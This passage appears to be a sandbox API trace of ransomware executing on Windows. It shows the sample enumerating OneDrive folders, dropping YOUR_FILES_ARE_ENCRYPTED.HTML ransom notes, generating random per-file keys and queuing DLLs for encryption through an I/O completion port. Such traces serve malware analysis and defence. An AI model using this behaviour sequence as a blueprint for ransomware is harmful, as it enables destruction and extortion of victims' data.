pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.461] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.461] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.461] lstrlenW (lpString=".mui") returned 4 [0160.461] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.461] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8ba14b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8ba14b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8ba14b0, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.461] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.461] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fa\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\fa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0160.462] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.465] CloseHandle (hObject=0x5ac) returned 1 [0160.465] GetProcessHeap () returned 0x270000 [0160.466] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.474] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8ba14b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e02ab0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e02ab0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fi", cAlternateFileName="")) returned 1 [0160.474] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | 
out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi") returned 74 [0160.474] GetProcessHeap () returned 0x270000 [0160.474] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.474] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi" [0160.475] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi\\*" [0160.475] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8ba14b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e02ab0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e02ab0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.477] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8ba14b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e02ab0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e02ab0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc40516, 
dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.477] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8e02ab0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e02ab0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e02ab0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.477] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.477] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.477] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.477] lstrlenW (lpString=".mui") returned 4 [0160.477] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.477] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8e02ab0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8e02ab0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8e02ab0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.478] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.478] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fi\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\fi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0160.478] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.484] CloseHandle (hObject=0x5ac) returned 1 [0160.484] GetProcessHeap () returned 0x270000 [0160.485] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.485] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8e02ab0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8fcbb30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8fcbb30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fil-ph", cAlternateFileName="")) returned 1 [0160.485] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph") returned 78 [0160.485] GetProcessHeap () returned 0x270000 [0160.485] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.485] lstrcpyW (in: lpString1=0x74d2010, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph" [0160.485] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph\\*" [0160.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8e02ab0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8fcbb30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8fcbb30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.486] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8e02ab0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8fcbb30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8fcbb30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.486] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8fcbb30, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8fcbb30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8fcbb30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.486] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph\\FileSync.LocalizedResources.dll.mui") returned 114 [0160.486] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.486] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.486] lstrlenW (lpString=".mui") returned 4 [0160.486] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.486] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8fcbb30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8fcbb30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8fcbb30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0xc40516, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.486] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.486] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0160.486] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fil-ph\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\fil-ph\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0160.487] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.489] CloseHandle (hObject=0x5ac) returned 1 [0160.489] GetProcessHeap () returned 0x270000 [0160.490] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.490] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3f03090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3f03090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3f03090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x116a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll", cAlternateFileName="FILESY~1.DLL")) returned 1 [0160.490] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll") returned 103 [0160.490] lstrcmpW (lpString1="FileSync.LocalizedResources.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.490] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll") returned=".dll" [0160.490] lstrlenW (lpString=".dll") returned 4 [0160.490] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll") returned=".dll" 
[0160.490] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\filesync.localizedresources.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0160.491] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=71336) returned 1 [0160.491] GetProcessHeap () returned 0x270000 [0160.491] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0160.493] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="13") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="3F") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="23") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="20") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="60") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="66") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="40") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="C4") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="58") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="9B") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="21") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="F8") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: 
param_1="42") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="48") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="B0") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="1D") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="DA") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="E4") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="D1") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="4F") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="EF") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="E2") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="89") returned 2 [0160.493] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="CE") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="6D") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="9F") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="D2") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="A5") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="79") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="34") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="32") returned 2 [0160.494] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="37") returned 2 [0160.494] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll" [0160.494] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.494] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0160.494] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3f9b610, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3f9b610, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3f9b610, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x2524a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.Resources.dll", cAlternateFileName="FILESY~2.DLL")) returned 1 [0160.495] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll") returned 94 [0160.495] lstrcmpW (lpString1="FileSync.Resources.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.495] PathFindExtensionW (pszPath="FileSync.Resources.dll") returned=".dll" [0160.495] lstrlenW (lpString=".dll") returned 4 [0160.495] PathFindExtensionW (pszPath="FileSync.Resources.dll") returned=".dll" [0160.495] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\filesync.resources.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0160.495] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=2434216) returned 1 [0160.495] GetProcessHeap () returned 0x270000 [0160.495] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0160.497] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="CD") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="44") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="A9") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="B1") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="87") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="B8") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="A7") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="43") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="1F") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="C5") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="34") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="0C") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="A9") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="21") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="29") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="6F") returned 2 
[0160.497] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="31") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="5E") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="66") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="D6") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="53") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="6A") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="7A") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="5A") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="01") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="46") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="68") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="8C") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="7C") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="30") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="D8") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="42") returned 2 [0160.499] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll" [0160.499] CreateIoCompletionPort (FileHandle=0x5b4, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, 
